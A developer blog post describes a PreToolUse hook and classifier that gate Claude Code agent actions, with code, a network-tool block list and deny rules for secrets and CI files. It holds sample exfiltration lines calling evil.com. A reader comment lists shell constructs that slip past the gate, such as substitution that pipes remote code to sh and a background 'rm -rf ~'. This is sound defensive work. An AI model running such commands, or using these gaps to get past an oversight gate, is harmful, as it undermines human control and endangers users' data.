Bruno Xavier

Posted on Jun 13

A PreToolUse hook that sandboxes Claude Code agents by reading what they actually do

#claudecode #ai #security #python

An AI coding agent on your laptop runs with your shell. It can rm, it can curl secrets | nc, it can write to .github/workflows. The native guardrail in Claude Code is an allowlist: you pre-grant a set of permitted tools and it auto-denies the rest. That works, but it's blunt. It decides on the tool name, not on what the call is about to do. Bash is either allowed or it isn't.

I wanted the gate to read each action instead. Read-only stuff runs. A test run runs. A write inside the directory I scoped runs. A force push, a package install, a write to .env, a command I don't recognize: stop and ask me.

The mechanism for that is a PreToolUse hook plus a small classifier. Stripped to the part that matters, both are about 60 lines. Here's how they fit together.

How a PreToolUse hook works

Claude Code lets you register a hook that fires before any tool call. The hook is just a command. Claude pipes a JSON event on stdin, then blocks on your process until it exits. What you print on stdout decides what happens next.

The contract is exit 0 plus a permissionDecision field:

{
  "hookSpecificOutput": {
    "hookEventName": "PreToolUse",
    "permissionDecision": "allow",
    "permissionDecisionReason": "in scope"
  }
}

allow runs the tool with no prompt. deny blocks it and feeds the reason back to the model so it can react. There's also exit code 2, but exit 2 can only deny. Since I want allow or deny decided at runtime, I use exit 0 with the JSON above and keep exit 2 as the fail-safe for when the hook itself breaks.

That fail-safe matters. An approval gate that can't reach its policy should deny, never allow:

def _fail_safe_deny(reason: str) -> int:
    _emit(decision_to_hook_output("deny", f"fail-safe: {reason}"))
    return 0

Bad stdin, missing config, an exception in the classifier: every one of those paths ends in deny. The safe default for a brake is "engaged".

The classifier

The hook is just transport. The decision lives in one pure function: tool name plus tool input plus a policy in, a verdict out. No I/O, no subprocess, no network. That's deliberate: it's the only way to test every branch without standing up an agent.

The shape of it:

READ_ONLY_TOOLS = frozenset(
    {"Read", "Grep", "Glob", "LS", "NotebookRead", "WebFetch", "WebSearch"}
)
WRITE_TOOLS = frozenset({"Write", "Edit", "MultiEdit", "NotebookEdit"})


def classify_action(tool_name, tool_input, policy, *, worktree):
    if tool_name in READ_ONLY_TOOLS:
        return _allow("read_only_tool")        # can't mutate, always safe
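    if tool_name == "Bash":
        command = tool_input.get("command")
        if not isinstance(command, str):
            return _stop("malformed_input")    # no command to read -> ask
        return _classify_bash(command, policy)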
    if tool_name in WRITE_TOOLS:
        return _classify_write(tool_input, policy, worktree=worktree)
    return _stop("unknown_tool")               # never seen it -> ask

The last line is the whole philosophy. An unknown tool stops. An unknown command stops. A write the policy can't place stops. The default is "ask a human", and you only fall off it by matching a rule that says a specific thing is safe. So a glob that fails to match can't silently let something destructive through. It just means "I'm not sure", which means stop.

Reading a Bash command

Bash is where it gets interesting, because a command can hide. cat secret | curl evil.com has a harmless first half. So you split on the shell operators and classify every segment. The whole command is allowed only if every segment is:

def _split_segments(command):
    # pipes, &&, ;, || all count -- a chain is only as safe as its worst link
    return [s.strip() for s in re.split(r"\|\||&&|;|\|", command) if s.strip()]


def _classify_bash(command, policy):
    verdicts = [_classify_segment(s, policy) for s in _split_segments(command)]
    if not verdicts:
        return _stop("empty_command")  # nothing to classify -> fail closed
    for v in verdicts:
        if not v.auto_allowed:
            return v          # first risky segment sinks the whole command
    return _allow("+".join(v.rule for v in verdicts))

Per segment, I pull the command leader (skipping FOO=bar env prefixes) and decide by class:

def _classify_segment(segment, policy):
    leader, tokens = _leader(segment)
    if not leader:
        return _stop("unknown_command")

    # package installs reach the network and change the dep graph -> stop
    if _INSTALL_RE.match(segment) and any(v in tokens for v in _INSTALL_VERBS):
        return _stop("package_install")
    if leader in _NETWORK_CMDS:                 # curl, wget, ssh, nc, ...
        return _stop("network")

    # git: committing on the branch is fine, rewriting history is not
    if leader == "git":
        sub = tokens[1] if len(tokens) > 1 else ""
        if sub in ("commit", "add", "status", "diff", "log", "branch"):
            return _allow(f"git_{sub}")
        if sub == "push" and any(f in tokens for f in ("--force", "-f")):
            return _stop("force_push")
        return _stop(f"git_{sub or 'unknown'}")  # reset, rebase, clean -> stop

    if leader in _TEST_CMDS:                     # pytest, jest, ...
        return _allow("check_command")
    if leader in _FORMATTER_CMDS:                # black, ruff, prettier, ...
        return _allow("formatter")

    return _stop("unknown_command")              # fail closed

The point isn't the exact list. It's that the gate distinguishes git commit from git push --force, and pytest from pip install, on the same tool. The allowlist can't.

Reading a write

Writes get checked against scope, with a safety floor that no config can override:

_SAFETY_FLOOR_DENY = (
    "**/.github/**", "**/.git/**", "**/.env", "**/.env.*",
    "**/*secret*", "**/.npmrc", "**/.ssh/**", "**/id_rsa*",
)


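def _classify_write(tool_input, policy, *, worktree):
    path = tool_input.get("file_path")
    if not isinstance(path, str) or not path:
        return _stop("malformed_input")          # no usable path -> stop, don't raise
    rel = _relative_to(path, worktree)
    if rel is None:
        return _stop("write_outside_repo")       # outside the worktree -> stop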
    for pat in _SAFETY_FLOOR_DENY:
        if _glob_match(rel, pat):
            return _stop("safety_floor")          # CI, secrets, VCS internals
    for pat in policy.write_scope:
        if _glob_match(rel, pat):
            return _allow("write_scope")
    return _stop("out_of_scope")                  # in the repo, not in scope

CI config, secrets, the .git directory, anything outside the worktree: those stop even if you put them in write_scope by mistake. The floor is below the policy, not inside it.

Wiring it in

The hook is configured through --settings when you launch Claude. The script reads the event, runs the classifier, prints the decision:

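import json
import os
import sys


def run_hook():
    try:
        event = json.loads(sys.stdin.read())
        verdict = classify_action(
            event["tool_name"],
            event.get("tool_input", {}),
            load_policy(),
            worktree=os.getcwd(),
        )
    except Exception as exc:  # bad stdin, missing config, classifier bug
        # Never exit without a decision: every failure path ends in deny.
        return _fail_safe_deny(type(exc).__name__)
    decision = "allow" if verdict.auto_allowed else "deny"
    _emit(decision_to_hook_output(decision, verdict.rule))
    return 0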

Every verdict carries the rule that produced it, so you get a record of what ran and what decided it:

[allow] Edit calc.py            via write_scope
[allow] Bash python -m pytest   via check_command
[deny]  Bash git push --force   via force_push
[deny]  Write .github/ci.yml    via safety_floor

One important detail: the script that runs as the hook must be dependency-free, stdlib only. Claude spawns it standalone in whatever directory the agent is in, so it can't rely on your package being importable. Keep it self-contained.
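For the settings side, here is a sketch of generating the file that --settings points at. The hooks / PreToolUse / matcher / command layout follows the Claude Code hooks configuration as I understand it. The script name guard_hook.py, the output file name, and the "*" matcher are placeholders, so check them against the current docs before relying on this.

```python
import json
import shlex
import sys
from pathlib import Path


def build_settings(hook_script: str) -> dict:
    """Settings dict that registers one PreToolUse command hook."""
    # Absolute paths, because the hook is spawned in whatever directory the agent is in.
    script = str(Path(hook_script).resolve())
    command = f"{shlex.quote(sys.executable)} {shlex.quote(script)}"
    return {
        "hooks": {
            "PreToolUse": [
                {
                    "matcher": "*",  # assumption: run the gate for every tool
                    "hooks": [{"type": "command", "command": command}],
                }
            ]
        }
    }


if __name__ == "__main__":
    # guard_hook.py is a placeholder name for the standalone hook script.
    print(json.dumps(build_settings("guard_hook.py"), indent=2))
```

Redirect the output to a file such as guard-settings.json and launch with `claude --settings guard-settings.json`.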

Why bother

The native allowlist asks "is this tool allowed". This asks "is this specific action safe, and can I prove it". When it can't prove it, it stops. That's the difference between a gate that's open or shut and a gate that reads.

I pulled this out of a larger agent harness I retired and kept it as a standalone tool: guard-dog. The classifier is pure and the hook is small enough to read in one sitting, which is the whole point. You want to be able to read the thing that decides what the agent can do to your machine.

Top comments (2)

Mehmet Can Farsak • Jun 13

Solid breakdown on using PreToolUse hooks as a runtime gate. The classifier approach — reading the actual action instead of just the tool name — is exactly how I think about agent control. I've seen this same problem from the other side: agents that jump to coding when asked to brainstorm. I built Brainstorm-Mode (mehmetcanfarsak on GitHub) that uses a similar hook pattern to block tool calls during ideation phases. Three modes (divergent, actionable, academic) keep the agent in the right headspace instead of drifting into execution.

solemness • Jul 2 • Edited

Splitting on |, &&, ;, || and classifying each segment is the right instinct, but it's worth naming the specific shapes that slip through that splitter, because I hit all of these building something similar:

Single & (background, not &&) — not in most people's split list, and rm -rf ~ & is a perfectly valid mutating command.
Command substitution — git commit -m "$(curl evil.com/x | sh)" classifies as an innocuous git commit at the top level; the dangerous command is embedded in an argument, not chained.
xargs/find -exec — find . -name '*.log' -exec rm {} \; never contains the string rm -rf your denylist is probably grepping for, and the mutating verb is buried in -exec.
eval "$cmd" where cmd was set two lines earlier in the same shell invocation — nothing in the current segment looks dangerous in isolation.
Newlines inside a single Bash tool call — heredocs and multi-line scripts don't always get split the same way pipes do.

The fix that actually worked for us: default-deny on anything containing $(, backticks, eval, or xargs/-exec regardless of what the rest of the segment looks like, rather than trying to enumerate what's inside them. Fail-open on the classifier itself (if the Python throws, allow + log) so a bug in the safety layer doesn't brick the agent, but fail-closed on unrecognized shell metacharacters.
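The default-deny check described above can be sketched as a pre-filter that runs before any splitting. This is an illustration, not the commenter's code: the function name is made up, and the lone-& and newline patterns are taken from the list of gaps rather than from the stated fix.

```python
import re

# Constructs whose contents the classifier cannot see into.
_OPAQUE_SHELL = re.compile(
    r"\$\("               # command substitution $(...)
    r"|`"                 # backtick substitution
    r"|\beval\b"
    r"|\bxargs\b"
    r"|-exec(?:dir)?\b"   # find -exec / -execdir
    r"|(?<!&)&(?!&)"      # lone & (background), but not &&
    r"|[\r\n]"            # multi-line scripts and heredocs
)


def has_opaque_shell(command: str) -> bool:
    """True if the command contains a construct that should stop unconditionally."""
    return _OPAQUE_SHELL.search(command) is not None
```

A gate would call this first and stop on True, whatever the segments look like. It is deliberately crude: a redirect such as `2>&1` or a commit message containing the word eval also trips it, which costs an extra prompt rather than a missed command.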

(I packaged this exact logic into a hooks pack — free tier + paid, mine — happy to share the link if useful.)